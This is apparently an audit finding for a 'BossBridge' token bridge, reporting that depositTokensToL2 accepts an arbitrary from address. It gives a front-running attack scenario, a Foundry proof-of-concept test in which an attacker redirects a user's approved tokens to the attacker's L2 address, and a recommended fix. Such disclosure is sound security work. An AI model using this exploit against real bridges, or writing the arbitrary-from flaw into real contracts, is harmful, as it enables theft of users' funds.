Tags: Beginner Friendly, Foundry, Bridge
Submission Details
Severity: high
Valid

Deposit call can be frontrun

Summary

The deposit call can be front-run because the function never checks that the caller is the owner of the tokens it transfers.

Vulnerability Details

The function transfers an amount of tokens from an address passed as a parameter, but it does not check that the caller of the function is actually the owner of those tokens. This opens up the following attack vector:

- A user (Alice) owns 100 tokens.
- Alice approves the `BossBridge` so that she can call `Deposit`.
- Alice calls `Deposit(Alice, AliceOnL2, 100)`.
- An attacker is watching the mempool for any `Deposit()` calls.
- The attacker submits a transaction with the following params: `Deposit(Alice, AttackerOnL2, 100)` and pays a higher gas fee.
- The attacker's transaction is mined before Alice's, and the tokens are minted on L2 to the `AttackerOnL2` address using Alice's tokens.

Impact

High: any user who has approved the bridge can have their tokens deposited on their behalf, with the L2 recipient set to an address the attacker controls.

Tools Used

Manual

Recommendations

Transfer the tokens from `msg.sender` instead of from the caller-supplied address, so that a deposit can only spend the caller's own tokens.

PoC (Foundry test; assumes `token`, `tokenBridge`, `vault`, `user` and the `Deposit(address,address,uint256)` event are set up in the surrounding test contract):

```solidity
function testUserCanDepositTokensFromAnotherUser() public {
    // create attacker addresses
    address attacker = makeAddr("attacker");
    address attackerInL2 = makeAddr("attackerInL2");
    // user approves the bridge to transfer their tokens (the normal first step of a deposit)
    uint256 initialUserBalance = token.balanceOf(address(user));
    vm.startPrank(user);
    uint256 amount = 10e18;
    token.approve(address(tokenBridge), amount);
    vm.stopPrank();
    // attacker deposits the user's tokens, naming their own L2 address as the recipient
    vm.startPrank(attacker);
    vm.expectEmit(address(tokenBridge));
    emit Deposit(user, attackerInL2, amount);
    tokenBridge.depositTokensToL2(user, attackerInL2, amount);
    // the user's tokens have been transferred into the vault
    assertEq(token.balanceOf(address(vault)), amount);
    assertEq(token.balanceOf(address(user)), initialUserBalance - amount);
    vm.stopPrank();
}
```
Updates

Lead Judging Commences

0xnevi Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

`depositTokensToL2()`: arbitrary `from` address
